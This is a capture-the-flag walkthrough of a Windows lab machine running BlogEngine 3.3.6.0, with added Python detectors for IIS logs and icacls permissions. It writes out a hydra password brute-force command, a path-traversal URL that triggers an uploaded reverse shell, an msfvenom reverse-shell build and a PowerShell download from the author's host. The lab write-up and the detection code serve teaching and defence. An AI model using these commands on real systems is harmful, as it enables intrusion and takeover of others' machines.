Target IP: 10.10.83.156
Challenge Description:
I wish to complete this CTF without using the Metasploit tool. There are two TCP ports open on the target machine, as shown above. They are HTTP and RDP applications on their standard ports.
Performing an aggressive port scan against the two TCP ports returns the result above. By the looks of it, the target machine is running Windows OS. And the HTTP application on port 80 is running IIS httpd 8.5. The scan above also found interesting entries inside the robots.txt.
Port 80: HTTP
The webpage above is displayed for this web application. It has a picture of Pennywise from the movie IT. The post above was created by the user administrator.
The source code of this webpage contains the application name & version BlogEngine 3.3.6.0, as shown above. Other than that, I did not find anything important.
Doing a Google search for exploits for this application version shows it is vulnerable to RCE, but I need a way to upload this exploit. The goal now is to exploit the web application. Maybe that will allow me to upload the exploit? This exploit has a requirement: it needs to be uploaded with the file name PostView.ascx, with the correct IP & port pointing to my machine. Time to enumerate further now.
Pressing the hamburger icon shows more options. There is a login option too, as shown above.
Pressing the Log In button from the previous image returns the login portal webpage shown above. I tried different default credentials such as admin:admin and admin:Passw@rd123, but I had no luck. Time to brute-force it. From previous enumeration, I noticed a username called administrator who made the single post. Maybe I can brute-force the password of the user admin or administrator?
I brute-forced the password 1qaz2wsx of the user admin using hydra, as shown above. The command I used is hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.83.156 http-post-form "/Account/login.aspx:__VIEWSTATE=1ZvQI0yKa1Blq4poeOhGvamUIlwpiuSuB0urhyfFUnK3dOg1%2F5KjpoevirBngbho0kYzeNKx5OlbGFT5IG7mO6wA5Ow5851Ji8O%2BXIgukfzyjp39nbTuI4MhPs4iMDdOEN%2FVKmjB4HfEp7QlU20obBDbNkqnvePduK8xAMDYRmToj8KqjQG9utYGzlVg15r73ZTdFNNdoyCZSIo%2FlT7I1M77y%2B2YkDmvuWEL%2BzF56iCpsjSzx59KQauejt%2BsQNsHa2559KC%2FC0Bm6OCyna0UG1R4WtBjhARum0r7xDtdLiUzW%2F%2BQNw8ZRlfEUmMfpA9WMlV7p5CtdYlmq3dkLcd%2BBIi3DEb6yImh4u6yO4maSjma%2F3Eo&__EVENTVALIDATION=cO2tDGMv1FACB7SwdzzFZZCFTktQOr5X2obAnQ3f%2Fr47dIOHIBO2tn2iVUnijn94dTOug4cWzYhXcqGykfKFQnXGADfTYENyakP93yvwD88F6jmH3o%2B7reKNCcdx2FN39sW%2F7%2BYdt5lAQVpCbYyiWzKbDTmqAd0JZk5MGWG26xtwE1PV&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed". I captured the full parameters of the HTTP request using the dev tools of the Mozilla browser.
After logging in with the credentials admin:1qaz2wsx, the same webpage above was returned to me. The web application did not indicate that the login was successful.
However, pressing the hamburger option shows a new option called Admin as shown above. Is this the admin login portal? Can I upload the exploit here?
And pressing the Admin button from the previous image loads up the webpage above. Now I have access to the administrator panel of the web application. Maybe I can run the exploit I found earlier now against the target machine?
More information about the target machine & web application is displayed above.
I downloaded a copy of the exploit I found previously. Then I changed the IP & port number on line 51 of the exploit to point to my machine. I also renamed the file to PostView.ascx as mentioned in the PoC.
I created a new post called Test as shown above. Then I uploaded the malicious reverse shell exploit with the name PostView.ascx using the File Manager option inside this new post. After this, I started a listener on my machine at port 8443.
Then I browsed to http://10.10.83.156/?theme=../../App_Data/files to trigger the reverse shell connection. I successfully obtained a reverse shell from the target machine on my machine at port 8443, running as iis apppool\blog. Now I have a foothold on the target machine. I tried to obtain a PowerShell session by modifying the exploit, but I had no luck.
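From the defender's side, both steps so far leave a trace in the IIS logs: the hydra run is a burst of POSTs to /Account/login.aspx from one client, and the trigger is a theme parameter carrying ../. The following is an added detection example, not code from the original write-up; the W3C field order, the threshold and the sample log lines are my assumptions (the lines are constructed, not captured).

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed IIS W3C log lines (not from the original post). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
IIS_LOG = """\
2024-01-01 10:00:01 10.10.83.156 POST /Account/login.aspx - 80 10.14.55.153 200
2024-01-01 10:00:01 10.10.83.156 POST /Account/login.aspx - 80 10.14.55.153 200
2024-01-01 10:00:02 10.10.83.156 POST /Account/login.aspx - 80 10.14.55.153 200
2024-01-01 10:00:02 10.10.83.156 POST /Account/login.aspx - 80 10.14.55.153 302
2024-01-01 10:00:30 10.10.83.156 GET / theme=../../App_Data/files 80 10.14.55.153 200
2024-01-01 10:00:31 10.10.83.156 GET / theme=..%2F..%2FApp_Data%2Ffiles 80 10.14.55.153 200
2024-01-01 10:01:00 10.10.83.156 GET /post/test theme=Standard 80 192.0.2.7 200
"""

LOGIN_THRESHOLD = 4   # POSTs to the login page from one client before we flag it (assumed)

def parse_lines(text):
    """Return one dict per request; comment lines and short lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) < 9:
            continue
        _date, _time, _s_ip, method, stem, query, _port, c_ip, status = parts[:9]
        rows.append({"method": method, "stem": stem, "c_ip": c_ip, "status": status,
                     "query": "" if query == "-" else query})
    return rows

def theme_traversal(query):
    """True when the BlogEngine 'theme' parameter climbs out of the themes folder.
    Decoded twice so %2F or %252E encodings do not hide the '..' segment."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == "theme":
            decoded = unquote(unquote(value)).replace("\\", "/")
            if re.search(r"(^|/)\.\.(/|$)", decoded):
                return True
    return False

def detect(text):
    """Summarise suspicious clients: login brute force and theme traversal."""
    rows = parse_lines(text)
    login_posts = Counter(r["c_ip"] for r in rows if r["method"] == "POST"
                          and r["stem"].lower() == "/account/login.aspx")
    return {
        "login_bruteforce": sorted(ip for ip, n in login_posts.items() if n >= LOGIN_THRESHOLD),
        "theme_traversal": sorted({r["c_ip"] for r in rows if theme_traversal(r["query"])}),
    }
```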
There is one local user with the name jeff, but I am unable to access this user's files. I will need to escalate privileges first to obtain the local.txt flag.
After some manual enumeration, I noticed the unusual directory with the name SystemScheduler as shown above.
I found an interesting log file called 20198415519.INI_LOG.txt. This log file contains the juicy information above. It looks like the application Message.exe is executed as the user Administrator. Maybe I can replace the Message.exe with a malicious version to obtain a reverse shell connection with administrator privileges?
Running icacls Message.exe shows the permission Everyone:(I)(M), meaning every user has Modify rights on it (the (I) flag shows the ACE is inherited). Does this mean I can modify this binary and replace it with a malicious reverse shell? Currently, I have a session on the target machine as iis apppool\blog. Can I modify this binary file as this user?
Using the command del Message.exe inside the c:\Program Files (x86)\SystemScheduler directory confirms this, as I can remove the executable file. Time to create a malicious executable file to obtain a reverse shell connection. The target machine is running an x64 architecture according to systeminfo.
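The root cause here is a binary executed with administrator privileges from a location that a broad group can modify. As an added example, not part of the original write-up, the parser below walks icacls output (the sample is constructed to mirror the finding above) and reports files whose contents Everyone or another broad group can change or replace. The principal list and the set of write-capable rights are my assumptions.

```python
import re

# Constructed icacls output for illustration (not captured from the original post).
# The first ACE of each file shares the line with the path; further ACEs are indented.
ICACLS_OUTPUT = r"""
C:\Program Files (x86)\SystemScheduler\Message.exe Everyone:(I)(M)
                                                   NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)
C:\Program Files (x86)\SystemScheduler\Other.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                 BUILTIN\Administrators:(I)(F)
                                                 BUILTIN\Users:(I)(RX)
Successfully processed 2 files; Failed processing 0 files
"""

# Principals that any low-privileged session (such as iis apppool\blog) belongs to (assumed list).
BROAD_PRINCIPALS = {"Everyone", "BUILTIN\\Users", "BUILTIN\\Guests",
                    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
# Simple and granular rights that allow changing the file's contents or replacing it.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "D", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Multi-word well-known principals are listed first so the path/principal split is unambiguous.
ACE_RE = re.compile(r"(?P<principal>NT AUTHORITY\\[^:]+|NT SERVICE\\[^:]+|CREATOR OWNER|\S+)"
                    r":(?P<perms>(?:\([^)]*\))+)\s*$")

def parse_icacls(text):
    """Yield (path, principal, set_of_rights) for every ACE in icacls output."""
    path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        prefix = line[:m.start()].rstrip()
        if prefix:                    # first ACE line carries the file path
            path = prefix
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("perms")):
            rights.update(r for r in group.split(",") if r not in INHERIT_FLAGS)
        yield path, m.group("principal"), rights

def writable_by_broad_groups(text):
    """Return {path: [principal, ...]} for files a broad group can modify or replace."""
    findings = {}
    for path, principal, rights in parse_icacls(text):
        if principal in BROAD_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.setdefault(path, []).append(principal)
    return findings
```

Run against the output of icacls over directories that scheduled tasks or services launch binaries from, anything it returns is a candidate for the same replacement the write-up performs and should be fixed by removing the Modify right from the broad group.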
I had VPN issues, so I had to reset the box. The target machine obtained the new IP 10.10.15.106. And I generated the malicious executable reverse shell file with the name Message.exe as shown above. To generate this, I used the command msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.55.153 LPORT=8444 -f exe -o Message.exe as shown above. This payload will invoke a reverse shell connection to my machine at port 8444.
I started a Python HTTP server on my machine to serve this malicious file to the target machine. Using the command powershell -c "iwr -uri http://10.14.55.153/Message.exe -Outfile Message.exe", I downloaded the malicious executable file on the target machine via my Python HTTP server.
I started a listener on my machine at port 8444. Then after waiting for some time, I obtained a reverse shell connection from the target machine as shown above.
Running powershell -c "whoami" shows the session belongs to the user administrator on the target machine. Now I have administrator access on the target machine. Game over.
The user.txt flag is shown above. This flag is located at the Desktop of user jeff.
The root.txt flag is shown above. This flag is located at the Desktop of user Administrator.